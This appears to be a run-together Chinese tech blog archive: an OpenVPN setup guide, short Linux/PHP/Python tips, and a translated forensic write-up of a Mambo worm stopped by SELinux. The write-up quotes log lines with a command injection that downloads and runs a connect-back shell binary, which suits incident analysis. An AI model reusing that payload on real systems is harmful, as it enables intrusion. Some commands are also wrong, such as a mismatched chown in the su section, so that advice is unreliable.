Article Last Updated: 2009-11-30 2:32PM zhaoke

OpenVPN is a free and open source virtual private network (VPN) program for creating point-to-point or server-to-multiclient encrypted tunnels between host computers.

This guide provides step-by-step instructions for how to setup an OpenVPN server and client, and you will be able to connect Windows 7 RTM 64-bit desktop computer to The Fedora Core 11 Linux Server.

[root@islab ~]# cat /etc/redhat-release
Fedora release 11 (Leonidas)

[root@islab ~]# rpm -qa|grep openvpn
openvpn-2.1-0.32.rc15.fc11.i586

1. Installing OpenVPN 2.1 Server on Fedora Core 11 Linux

1.1 Preparing the Network

The server ip is 210.77.100.1, running Fedora Core 11 Linux with OpenVPN 2.1, The Desktop has a dynamic IP address, running Windows RTM 64-bit with OpenVPN GUI 1.0.3.

Linux DNS Settings:

[root@islab ~]# cat /etc/resolv.conf
; generated by /sbin/dhclient-script
nameserver 210.77.102.5
nameserver 210.77.103.5

1.2 Preparing the System

OpenVPN installation on Fedora makes use of the yum, wget and rpm commands assume you installed both yum and rpm. Log in as the root user and issue the following command:

[root@islab ~]# yum update;yum install wget -y

Futhermore get a few additional packages:

openssl
openssl-devel
lzo
lzo-devel
pam
pam-devel

[root@islab ~]# yum install openssl openssl-devel lzo lzo-devel pam pam-devel -y

OpenVPN connects two tun devices on different machines using udp or tcp packets. so make sure a tun virtual device driver exists(surely, fedora core linux 11 support TUN/TAP Devices):

[root@islab ~]# cat /proc/net/dev|grep tun

if show nothing, indicates that your kernel does not have TUN/TAP support compiled in. Rebuild your kernel with the appropriate configuration.

check your kernel config file for CONFIG_TUN=m or CONFIG_TUN=y

[root@islab ~]# grep “TUN” /usr/src/linux/.config

CONFIG_TUN=m or
CONFIG_TUN=y

Fore more information about enabling linux kernel support for TUN/TAP devices, please reference:
http://www.installationwiki.org/OpenVPN#Enabling_Linux_kernel_support_for_TUN.2FTAP_devices

1.3 Installing OpenVPN Server

With above steps now complete, it’s time to install it. Follow these steps:

[root@islab ~]# yum install openvpn -y

1.4 Generate the Master CA key:

[root@islab ~]# cp -ai /usr/share/openvpn/easy-rsa/2.0 ~/easy-rsa
[root@islab ~]# cd ~/easy-rsa
[root@islab ~]# pwd
/root/easy-rsa

[root@islab ~]# mkdir /etc/openvpn/keys
[root@islab ~]# cp -ai ~/easy-rsa/keys/* /etc/openvpn/keys
[root@islab ~]# . ./vars
Notes: there’s a space between the dot.

[root@islab ~]# ./clean-all

Creating a shell script to set the values of some user-defined environment variables that used in generating the key. I create a file named genvars_ca, and it contains the following contents:

export KEY_CONFIG=/root/easy-rsa/openssl.cnf
export KEY_DIR=/etc/openvpn/keys
export KEY_SIZE=1024
export KEY_COUNTRY=CN
export KEY_PROVINCE=BJ
export KEY_CITY=BJ
export KEY_ORG="islab.org"
export KEY_EMAIL="youremail@yourcompany.com"
exec $SHELL -i

http://zhaoke.com/blog/data/2009/1130/genvars_ca

Ensure that you chmod your script to allow execute permissions:
[root@islab ~]# chmod +x genvars_ca

Run your script:
[root@islab ~]# ./genvars_ca

Make sure you used this command to verify your shell changes:
[root@islab ~]# env|grep KEY

Next, initialize the PKI:
[root@islab ~]# ./build-ca
Output:

Generating a 1024 bit RSA private key
……….++++++
…………………………………………………..++++++
writing new private key to ‘ca.key’
—–
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
Country Name (2 letter code) [CN]:
State or Province Name (full name) [BJ]:
Locality Name (eg, city) [BJ]:
Organization Name (eg, company) [islab.org]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server’s hostname) [islab.org CA]:
Name []:
Email Address [youremail@yourcompany.com]:

1.5 Generate key for server:

Note that just hit enter with most parameters, except common name enter “server”.

[root@islab ~]# ./build-key-server server
Output:

Generating a 1024 bit RSA private key
……..++++++
.++++++
writing new private key to ’server.key’
—–
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
Country Name (2 letter code) [CN]:
State or Province Name (full name) [BJ]:
Locality Name (eg, city) [BJ]:
Organization Name (eg, company) [islab.org]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server’s hostname) [server]:
Name []:
Email Address [youremail@yourcompany.com]:

Please enter the following ‘extra’ attributes
to be sent with your certificate request
A challenge password []:zhaoke.com
An optional company name []:zhaoke.com
Using configuration from /root/easy-rsa/openssl.cnf
Check that the request matches the signature
Signature ok
The Subject’s Distinguished Name is as follows
countryName : PRINTABLE:’CN’
stateOrProvinceName : PRINTABLE:’BJ’
localityName : PRINTABLE:’BJ’
organizationName : PRINTABLE:’islab.org’
commonName : PRINTABLE:’server’
emailAddress : IA5STRING:’youremail@yourcompany.com’
Certificate is to be certified until Nov 27 13:49:01 2019 GMT (3650 days)
Sign the certificate? [y/n]:y

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated

1.6 Generate key for client:

As above, common name must be unique, if you have more clients, for each client, enter like as below:
./build-key client1
./build-key client2
…

Now let’s generate key for one client:

[root@islab ~]# ./build-key client
Output:

Generating a 1024 bit RSA private key
……++++++
………………….++++++
writing new private key to ‘client.key’
—–
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
Country Name (2 letter code) [CN]:
State or Province Name (full name) [BJ]:
Locality Name (eg, city) [BJ]:
Organization Name (eg, company) [islab.org]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server’s hostname) [client]:
Name []:
Email Address [dns-manager@islab.org]:

Please enter the following ‘extra’ attributes
to be sent with your certificate request
A challenge password []:zhaoke.com
An optional company name []:zhaoke.com
Using configuration from /root/easy-rsa/openssl.cnf
Check that the request matches the signature
Signature ok
The Subject’s Distinguished Name is as follows
countryName : PRINTABLE:’CN’
stateOrProvinceName : PRINTABLE:’BJ’
localityName : PRINTABLE:’BJ’
organizationName : PRINTABLE:’islab.org’
commonName : PRINTABLE:’client’
emailAddress : IA5STRING:’youremail@yourcompany.com’
Certificate is to be certified until Nov 27 13:57:06 2019 GMT (3650 days)
Sign the certificate? [y/n]:y

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries

1.7 Generate Diffie Hellman parameters:

[root@islab ~]# ./build-dh
Output:

Generating DH parameters, 1024 bit long safe prime, generator 2
This is going to take a long time
……+….+…………………..++*++*++*

1.8 Creating and Editing the server configuration file:

Copy roadwarrior-server.conf to /etc/openvpn/ and edit appropriately
[root@islab ~]# cp -ai /usr/share/doc/openvpn-*/sample-config-files/roadwarrior-server.conf /etc/openvpn/server.conf

port 1194
proto udp
dev tun
ca keys/ca.crt
cert keys/server.crt
key keys/server.key
dh keys/dh1024.pem

keepalive 10 120
comp-lzo
persist-key
persist-tun
status server-udp_status.log
verb 4

Download server.conf from here:
http://zhaoke.com/blog/data/2009/1130/server.conf
or wget http://zhaoke.com/blog/data/2009/1130/server.conf

1.9 Running the VPN server:
[root@islab ~]# chkconfig --level 2345 openvpn on
[root@islab ~]# service openvpn start
Make sure UDP port 1194 is open on the server:
[root@islab ~]# lsof -i:1194
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
openvpn 31758 root 5u IPv4 398062 UDP *:openvpn

Then enable IP forwarding:
[root@islab ~]# echo 1 > /proc/sys/net/ipv4/ip_forward

Configure Firewall and NAT:

[root@islab ~]# iptables -t nat -A POSTROUTING -s 172.6.1.0/24 -o eth0 -j SNAT --to-source 210.77.100.1

saving iptables rules:
[root@islab ~]# service iptables save
iptables: Saving firewall rules to /etc/sysconfig/iptables: [ OK ]

if iptables is not installed, just run:
[root@islab ~]# yum install iptables;service iptables start

2. Installing OpenVPN GUI on windows 7 64-bit

The latest verion of OpenVPN GUI support windows 7 64-bit, just download it from here:
http://openvpn.se/download.html

Then you need to copy these keys to your desktop computer via your OpenVPN server:

On server-side:

[root@islab ~]# mkdir -p ~/client
[root@islab ~]# cd /etc/openvpn/keys
[root@islab ~]# cp -ai client.{crt,key,csr} ca.{crt,key} ~/client

Creating and editing the client configuration file:

Copy roadwarrior-server.conf to /etc/openvpn/ and edit appropriately
[root@islab ~]#cp -ai /usr/share/doc/openvpn-*/sample-config-files/roadwarrior-server.conf /etc/openvpn/client.conf

client
dev tun
proto udp

nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
comp-lzo
verb 4

Download ovpn.conf from here:
http://zhaoke.com/blog/data/2009/1130/ovpn.conf

Rename the file client.conf to client.ovpn and move it to ~/client directory:
[root@islab ~]# cd /etc/openvpn
[root@islab ~]# mv client.conf client.ovpn
[root@islab ~]# cp -ai /etc/openvpn/client.ovpn ~/client

Compress the folder “~/client” and transfer it to local directory C:\Program Files (x86)\OpenVPN\config\ on the client:

[root@islab ~]# cd ~
[root@islab ~]# tar cvf client.tar client/
[root@islab ~]# mv client.tar ../public_html
then grab client.tar from your windows browser and uncompressed it to config directory.

Remember to set the compatibility with OpenVPN GUI(right click > Properties > Compatibility tab), and set it to run as an administrator.

Now connect to your vpn server, right-click the OpenVPN GUI and click connect. if the OpenVPN icon in the taskbar turn green, you are connected to VPN.

You can successfully ping 172.6.1.1:

网址:
http://xen.islab.org/test/ps.php

上面网页提供了两个实例:

1. 查看当前http活动连接数.
2. 查看httpd进程的状态.

注: 输出数据每隔15秒钟刷新一次.

本文主要介绍如何在php网页中使用ob_start()和ob_gzhandler()函数压缩网页, 并测试压缩效果.

1. 准备

首先查看php是否支持zlib module, 检查phpinfo()信息或者拷贝下面代码到info.php中:

[code]
phpinfo();
?>
[/code]

然后把info.php上传到您的web服务器上, 打开您的浏览器, 访问info.php网页, 查看zlib部分. 如果zlib已安装, 如下图所示:

另外注意服务器上的PHP版本要在4.0.6或者以上版本, 否则您将不能成功使用本文的方法成功压缩PHP网页.

2. 部署

你仅需要拷贝下面代码到test.php中, 然后上传到web服务器上:
[code]
ob_start( 'ob_gzhandler' );
?>

网页压缩成功!

[/code]
实例(压缩):
http://islab.org/test/080223/test.php

实例(未压缩):
http://islab.org/test/080223/test_uncompress.php

3. 测试

实例(压缩):
http://islab.org/test/080223/test.php

测试结果:
URL Compression Report

URL Downloaded:
http://islab.org/test/080223/test.php

Document Status: Compressed

Compressed File Size: 79
Is PipeBoost Customer: NO
File Is already being served by HTTP Compression Software. No analysis has been done.
Original File Size: 67
Original File Size Reduction: 8.96%

Header Value
Date Sat, 23 Feb 2008 13:48:01 GMT
Server Apache
Content-Encoding gzip
Vary Accept-Encoding
Keep-Alive timeout=15, max=100
Connection Keep-Alive
Transfer-Encoding chunked
Content-Type text/html

实例(未压缩):
http://islab.org/test/080223/test_uncompress.php

URL Downloaded:
http://islab.org/test/080223/test_uncomp
ress.php

Document Status: Uncompressed

Uncompressed File Size: 63
Compressed File Size: 68
Compression CPU Time Consumption: < 10 ms.
Compression Ratio: 9 - Highest
*File Size Reduction: -7.94%
Downloads Speed Improvement: -7%
*Please note, that URL Compression Report will not process frames, entry redirect pages, Java Script includes and Style Sheets. Please specify exact URL location if you want to get very specific results.

Downloaded HTTP Headers:

Header Value
Date Sat, 23 Feb 2008 13:50:13 GMT
Server Apache
Keep-Alive timeout=15, max=100
Connection Keep-Alive
Transfer-Encoding chunked
Content-Type text/html

4. 小结
1). 从上面测试结果我们可以看到采用压缩后的PHP网页, 大小由原来的79字节减少到67字节.
2). 我们访问压缩后的PHP网页, 访问速度有所提高, 从而也减少了总的数据流量.
3). 由于图片本身是经过压缩的(比如gif, jpg, 等等), 该方法对图片不会有任何影响.

平台: Python 2.4.4, Fedora Core 6

Python是一门易学, 开源的脚本语言, 下面介绍使用Python脚本查看Linux上的进程信息.

Python模块是Python语言中的一个重要概念,比如commands模块主要封装了命令相应的方法及数据. 我们可以通过import指令导入模块. 下面实例中用到了命令, 系统和字符串模块.

Queryprocess.py的主要功能是查看Linux上指定进程的控制终端(tty), 所有者(uid), 进程号(pid), 父进程号(ppid)和进程开始运行时间(stime).

创建python脚本文件queryprocess.py

islab$ vi queryprocess.py

增加下面源代码到queryproces.py中

#!/usr/bin/env python
# Query process returns the following information: tty, uid, pid, ppid and stime.

import commands, os, string

program = raw_input(”Enter the name of your process to query: “)

try:
#excute the ps command and assign results to a list
output = commands.getoutput(”ps -ef|grep ” + program)
proginfo = string.split(output)

#display results
print “\n\
Terminal:\t\t”, proginfo[5], “\n\
Owning User:\t\t\t”, proginfo[0], “\n\
Process ID:\t\t”, proginfo[1], “\n\
Parent Process ID:\t”, proginfo[2], “\n\
System Time:\t\t”, proginfo[4]
except:
print “There is a problem with the process u are querying.”

运行querprocess.py
islab$ chmod +x queryprocess.py
islab$ ./queryprocess.py
Enter the name of your process to query: syslogd

Terminal: ?
Owning User: root
Process ID: 2387
Parent Process ID: 1
System Time: Aug09

从上面结果我们看到syslogd进程的所有者是root用户, 进程号为2387, 父进程号是1, 进程开始运行时间是8月9日.

同样我们也可以linux命令行运行下面命令获得上面信息:

islab$ ps -ef|grep syslogd
root 2387 1 0 Aug09 ? 00:00:01 syslogd -m 0

对比两种方法的执行结果后我们可以看到用python能够更加友好的输出信息.

基础:

首先我们看su在man帮助页中的解释su - run a shell with substitute user and group IDs, 也就是说通过su我们不用提供用户和组名就可以启动一个shell程序. su是一个二进制的可执行文件, 命令所在的文件路径是/bin/su, 下面是通过命令行查询su文件的类型及所在路径:

例一:
islab$ which su
/bin/su

例二:
islab$ file /bin/su
/bin/su: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.9, stripped

例三:
islab$ll /bin/su
-rwsr-xr-x 1 root root 24060 Jan 10 2007 /bin/su

例三和例二中我们可以看到su是一个setuid程序(setuid位可以使用chmod u+s进行设置, 如ls显示su文件所有者属性起用了setuid位), 在这种情况下, su可以获得比其所有者更高的权限, 也就是说su运行的时候, 您的权限会被提升, 将与root的权限等同.

例三中我们可以看到文件的类型是ELF 32-bit LSB shared object(设置了setuid位), 也就是说程序需要libc这样的函数库, 也需要使用了ELF解释器, 并遵守LSB 规范.

问一: 普通用户可以从其它机器拷贝su命令.
答: 他们可以从其它机器拷贝su命令, 但是他们将不能对su进行正确的权限设置比如chown root和chmod u+s等等. 所以拷贝过来su不能够正常工作.

问二: 如何防止普通用户执行su命令.
答:

1). 你可以建立一个专门的组, 只有组成员才能执行su命令
islab# groupadd wheel
islab# useradd wheel
islab# chown root:mysql /bin/bash
islab# chmod 4750 /bin/su

2). 只有root用户才能执行su命令.
islab# chmod 4700 /bin/su

3). 通过pam库实现只有wheel组成员才能执行su命令, 下面例子中增加了zhaoke帐号到wheel组中.
islab# groupadd wheel
islab# useradd wheel
islab# usermod -G wheel zhaoke
islab# ll /lib/security/pam_wheel.so
-rwxr-xr-x 1 root root 5692 Feb 22 2007 /lib/security/pam_wheel.so
islab# vi /etc/pam.d/su
增加下面一行auth required /lib/security/pam_wheel.so use_uid
然后保存退出su配置文件.

问三: 普通用户虽然不能执行su命令, 但是还有可能通过蛮力攻击获得root的密码
答: 普通用户可以在shell或者ssh方式对root帐户进行蛮力攻击.我们可以考虑使用一些安全工具如pam_abl来对ssh进行保护. pam_abl将能在设定的时间内对错误登陆的帐户进行进行临时封禁. 当然普通用户也可以通过程序漏洞提升权限, 比如缓冲区溢出.

实例一: 修改当前目录所有的*.php5为*.php文件.

方法一

for old in *.php5; do cp $old `basename $old .php5`.php; done

使用循环语句发现当前目录的所有*.php5文件, 然后一个接一个的修改为*.php文件, 直到结束.
比如当前目录存在两个*.php5文件:
$ ll
total 8
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 07:58 islab.php5
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 08:10 zhaoke.php5

首先找到当前目录的islab.php5文件, 然后拷贝islab.php5, ‘basename islab.php5 .php5′ .php
basename将返回”islab”字符, 然后增加.php到islab后面, 最后你得到islab.php文件.

shell命令运行后的当前目录:
$ for old in *.php5; do cp $old `basename $old .php5`.php; done
$ ll
total 16
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 08:39 islab.php
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 07:58 islab.php5
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 08:39 zhaoke.php
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 08:10 zhaoke.php5

你也可以修改shell命令中的cp为mv:
$ for old in *.php5; do mv $old `basename $old .php5`.php; done
$ ll
total 8
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 07:58 islab.php
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 08:10 zhaoke.php

方法二
$ rename .php5 .php *.php5

方法三
for x in *.php5; do n=${x/.php5/.php}; mv $x $n; done

方法四
for a in *php5 ; do mv $a ${a%%5} ; done

方法五
for a in *.php5; do t=`echo $a | sed ’s/.php5$/.php/’`; mv $a $t; done

实例二: 把当前目录下所有文件及目录名中的大写字符改为小写符号

方法一:
1. 创建一个ucase脚本, 内容如下:
#!/bin/bash
# All names are converted to lower-case before matching
# [A-Z]* matches upper case names
for i in [A-Z]*
do
j=`echo $i | tr ‘[A-Z]’ ‘[a-z]’`
mv $i $j
done

2. 赋予ucase脚本可执行权限
$ chmod +x ucase

3. 列出当前目录下的所有文件及目录
$ ll
total 16
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 08:42 Islab.php
-rwxrwxr-x 1 zhaoke zhaoke 187 Aug 20 08:54 ucase
drwxrwxr-x 2 zhaoke zhaoke 4096 Aug 20 08:54 ZhaoKe
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 07:58 zhaoke.php

4. 运行ucase脚本并查看结果
./ucase
mv: `ucase’ and `ucase’ are the same file
mv: `zhaoke.php’ and `zhaoke.php’ are the same file
$ ll
total 16
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 08:42 islab.php
-rwxrwxr-x 1 zhaoke zhaoke 187 Aug 20 08:54 ucase
drwxrwxr-x 2 zhaoke zhaoke 4096 Aug 20 08:54 zhaoke
-rw-rw-r– 1 zhaoke zhaoke 3 Aug 20 07:58 zhaoke.php

方法二:
$ rename ‘y/A-Z/a-z/’ *

Linux杂志发布了一篇有趣的文章, 使用SELinux阻止Mambo攻击, 作者是Richard Bullington-McGuire.

什么是Mambo? Mambo是一个用PHP开发的内容管理系统(CMS). 在某些地方, 病毒能够对系统进行攻击, 其中病毒就能顺利地破坏Richard的操作系统. 文章详细描述了如何使用SELinux发现和控制缺口.

文章还演示了SELinux的一个核心目标: 阻止恶意软件利用受病毒感染的软件来破坏系统. 在本实例中, 第三方的PHP应用程序能够对系统产生一定的负载, 但是这些负载可以控制, 将不会对系统进行任何破坏.

这篇文章对于计算机鉴识过程来说也非常具有参考价值.

原文标题及网址:
Mambo Exploit Blocked by SELinux
http://interactive.linuxjournal.com/article/9176f

下面是中文版本:

使用SELinux阻止Mambo攻击

一个真实的SELinux实例.

如果您管理着一台连接互连网的服务器, 您将有机会成功的组织一次攻击. 去年我发现, 尽管我在一台测试Web服务器(目标主机)上部署了多层防御, 但是最终攻击者还是通过使用攻击代码(部分)成功地获得了主机的访问权限. 该服务器运行的是Red Hat Enterprise 4(RHEL 4)企业版和Mambo内容管理系统. 服务器部署了多层防御, 包括安全性增强型版本的Linux(SElinux). SElinux可以有效阻止攻击者执行第二阶段的攻击, 可能阻止攻击者获得目标主机的root权限.

本文展示了一个学习入侵防御的实例, 解释了: 我是如何发现入侵, 我通过哪些步骤识别了攻击代码, 我是如何进行攻击修复, 我得到了系统安全方面的哪些教训. 由于隐私原因, 我修改了机器名和IP地址.

攻击过程中用到的计算机:

目标主机(targetbox): 192.168.166.155 我们的服务器, 运行RHEL 4和Mambo.
病毒主机(wormhole): 10.9.233.24 病毒攻击来源.
僵死web主机(zombieweb): 172.16.31.57 用来寄存攻击负载的Web主机.
cback主机(cbackbox): 10.200.238.39 第二阶段病毒攻击的目标.

防御您的系统

今天谨慎的系统管理员至少会使用一层的安全方法来防御他们的主机, 安全方法如, 使用防火墙, 自动补丁管理系统, 日志分析工具和SELinux. SELinux提供了额外的访问控制机制, 这在传统Unix安全模型中是没有的. 最近Red Hat Linux企业版和Fedora Core发行版已经包含了”SELinux目标策略”. 目的是降低程序运行的安全风险, 限制多个软件包中程序的权限, 确保程序能够正确操作. 我们可以通过限制特定文件或目录的”读, 写和执行权限”来阻止攻击.

发现入侵事件

大概在2006年5月6日星期六的早上8点, 我正在审计目标主机的日志, 在/var/log/messages文件中发现了一条SELinux强制消息:

May 4 07:52:27 targetbox kernel: audit(1146743547.060:2277):
avc: denied { execute_no_trans } for pid=9401 comm=”sh”
name=”cback” dev=dm-0 ino=852100
scontext=user_u:system_r:httpd_sys_script_t
tcontext=user_u:object_r:httpd_sys_script_rw_t tclass=file

尝试使用locate快速识别cback:

# locate cback
/tmp/cback
/usr/share/pixmaps/gnome-ccbackground.png
/usr/lib/libartscbackend.la
/usr/lib/libartscbackend.so.0.0.0
/usr/lib/libartscbackend.so.0

使用文件命令揭露cback执行程序的文件类型:

# file /tmp/cback
/tmp/cback: ELF 32-bit LSB executable, Intel 80386,
version 1 (SYSV), for GNU/Linux 2.2.0, dynamically
linked (uses shared libs), not stripped

用户apache拥有cback文件, 但是日期确显示的是在目标主机最初安装系统之前的几个月:

# ls -i /tmp/cback
852100 /tmp/cback
[root@targetbox ~]# ls -lZ /tmp/cback
-rwxr–r– apache apache
user_u:object_r:httpd_sys_script_rw_t /tmp/cback
[root@targetbox ~]# ls -lai /tmp/cback
852100 -rwxr–r– 1 apache apache 13901
Feb 15 2005 /tmp/cback

上面可以确认在审计消息中是cback是一个文件, 它有inode节点号852100.

如果locate没有发现文件, 我用find命令通过inode号找到了文件:

# find / -inum 852100 2>/dev/null
/tmp/cback

通过分析执行文件来寻找线索

清晰了脚本名称, 它的目的可能是充当回调程序. 因为apache用户拥有该文件, 我检查了Web服务器的日志文件, 看是否能找到任何线索.

因为攻击程序位于/tmp目录, 为了保护证据, 我保存了一份拷贝.

攻击程序似乎是使用sockets方法, 我们可以通过下面的字符串来判断(列表1).

列表1. 攻击负载字符串

# strings cback
/lib/ld-linux.so.2
libc.so.6
printf
connect
strerror
execl
dup2
sleep
socket
inet_addr
wait
fork
htons
__errno_location
exit
atoi
_IO_stdin_used
__libc_start_main
close
__gmon_start__
GLIBC_2.0
PTRh
[^_]
%s cannot create socket, retrying in 5 seconds
socket ok
error: %s
retting in 5 seconds
/bin/sh
fork error, retry in 5 seconds

我在Web服务器的日志文件中发现了很多可疑的请求, 一些使用了命令注射和wget来攻击Mambo程序, 还有一些攻击其它的内容管理系统. 我使用grep拷贝了文件中所有包含php或者wget的行, 然后把这些行放到/root/exploit.log文件. 列表2包含了许多最近攻击尝试的跟踪信息.

列表2. Web服务器访问日志的攻击跟踪

# grep 10.9.233.25 /root/exploit.log
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:21 -0400]
“GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php
?_REQUEST[option]=com_content&_REQUEST[Itemid]
=1&GLOBALS=&mosConfig_absolute_path=
http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
wget%20172.16.31.57/cback;chmod%20744%20cback;
./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1″ 200 594 “-” “Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)”
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:24 -0400]
“GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
wget%20172.16.31.57/cback;chmod%20744%20cback;
./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1″ 404 294 “-” “Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)”
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:25 -0400]
“GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
wget%20172.16.31.57/cback;chmod%20744%20cback;
./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1″ 404 292 “-” “Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)”
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:27 -0400]
“POST /xmlrpc.php HTTP/1.1″ 404 288 “-” “Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)”

日志文件包含了两个非常有用的线索; 它确认了cback二进制文件跟”发送到Mambo程序的请求”有关系. 更多的是, 查询字符串证实了攻击者使用了wget, 一个命令行的网址抓取工具, 这样一来可以从远程服务器获得攻击代码. Web服务请求尝试使用IP参数10.200.238.39来执行cback二进制程序, 估计攻击者控制了另外一台机器.

攻击尝试执行shell命令序列:

cd /tmp
wget 172.16.31.57/cback
chmod 744 cback
./cback 10.200.238.39 8080
echo YYY
echo| HTTP/1.1

返回到/var/log/messages文件, 我搜索了更多可疑的SELinux强制消息. 列表3包含了匹配的Web服务器攻击次数.

列表3. SELinux审计消息

May 4 07:52:24 targetbox kernel:
audit(1146743544.910:2275): avc:
denied { ioctl } for pid=9399 comm=”wget”
name=”error_log” dev=dm-0
ino=1624085 scontext=user_u:system_r:httpd_sys_script_t
tcontext=root:object_r:httpd_log_t tclass=file
May 4 07:52:24 targetbox
kernel: audit(1146743544.911:2276):
avc: denied { ioctl } for pid=9399
comm=”wget” name=”error_log” dev=dm-0 ino=1624085
scontext=user_u:system_r:httpd_sys_script_t
tcontext=root:object_r:httpd_log_t
tclass=file
May 4 07:52:27 targetbox kernel: audit(1146743547.060:2277):
avc: denied { execute_no_trans } for pid=9401 comm=”sh”
name=”cback” dev=dm-0 ino=852100
scontext=user_u:system_r:httpd_sys_script_t
tcontext=user_u:object_r:httpd_sys_script_rw
_t tclass=file

这显然是一个病毒, 因为www.pkrinternet.com同时(在另外一台机器, 但在同一个子网)也已经从10.9.233.25发送了请求, 看列表4.

列表4. 通过附近的服务器验证病毒的活动

$ grep 10.9.233.25 \
/var/log/httpd/www.pkrinternet.com-access_log
10.9.233.25 - - [04/May/2006:07:52:21 -0400]
“GET
/index2.php?option=com_content&do_pdf=1&id=
1index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
wget%20172.16.31.57/cback;chmod%20744%20cback;
./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1″ 404 290 “-” “Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)”
10.9.233.25 - - [04/May/2006:07:52:21 -0400]
“GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST
[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=
http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
wget%20172.16.31.57/cback;chmod%20744%20cback;
./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1″ 404 289 “-” “Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)”
[ …output trimmed ]

上面显示了更多的攻击类型, 比如跟踪stockpot(类似Mambo的内容管理系统), xmlrpc.php, drupal和phpgroupware也出现在上面的grep结果中.

病毒只发送请求到指定的虚拟主机. 所以看起来病毒没有使用主机: 虚拟主机报头出现在请求当中. 这也意味着漏洞程序正在扫描同一子网, 而不是扫描大量的主机.

cback文件的修改时间是2005年2月5日. 这可能是wget从远程主机抓取文件的修改时间. wget通常会重置下载文件的修改时间, 从而与文件的最初修改时间匹配. 列表5显示了如何查询一个文件的所有时间戳.

列表5. 分析文件的时间戳
$ for x in atime access status use; do
> echo -n “$x ”
> ls -l –time=$x /tmp/cback
> done
[rbulling@targetbox ~]$ for x in atime access status use mtime; do
> echo -n “$x ” ; ls -l –time=$x /tmp/cback
> done
atime -rwxr–r– 1 apache apache 13901 May 6 11:33 /tmp/cback
access -rwxr–r– 1 apache apache 13901 May 6 11:33 /tmp/cback
status -rwxr–r– 1 apache apache 13901 May 4 07:52 /tmp/cback
use -rwxr–r– 1 apache apache 13901 May 6 11:33 /tmp/cback

cback二进制文件大概创建于5月4日的下午07:52, 这与wget命令注射攻击的时间是吻合的. 这也是文件属性的最后一次修改. 虽然Unix不允许您获取一个文件的真实创建时间, 但状态时间可以知道文件的真实创建时间. 其它时间与我对cback文件进行最初的分析是相吻合的. 如果更加仔细点的话, 我可以在访问cback文件之前使用ls命令, 这样atime, access和use时间将会是攻击者的时间.

是什么引起了我的注意?

因为这看起来像是病毒正在攻击Mambo, 通过Google搜索关键字”mambo worm”, 您可以发现很多攻击参考信息, 包括ComputerWorks的文章,
F-Secure和Bugtraq(见资源栏目).

MITRE的Common Vulnerabilities and Exposures (CVE)项目提供了大多已知的漏洞. 所有的漏洞都有一个特征信息, 包括已确认问题的安全邮件列表和网站. 在cvw.mitre.org上搜索”mambo”, 然后会生成一些已发现的漏洞, 比如其中之一CVS-2005-3738有关mosConfig_absolute_path, 请求URL中的一个重要的变量.

当仔细阅读了最近有关Mambo的恶意软件活动后, 我发现攻击者大概会更加密切关注Net-Worm.Linux.Mare.d漏洞, 在很多新闻报道和漏洞数据库中都有描述. 然而, 一些攻击执行程序的名字(比如cback)在某些漏洞报告中名字有所不同.

安全预防和取证

